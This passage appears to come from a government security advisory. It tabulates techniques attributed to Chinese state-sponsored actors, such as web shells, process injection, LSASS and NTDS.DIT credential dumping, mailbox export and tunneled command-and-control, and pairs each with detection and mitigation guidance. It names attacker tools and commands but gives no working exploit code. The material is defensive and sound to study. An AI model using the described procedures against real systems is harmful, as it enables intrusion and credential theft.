to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection 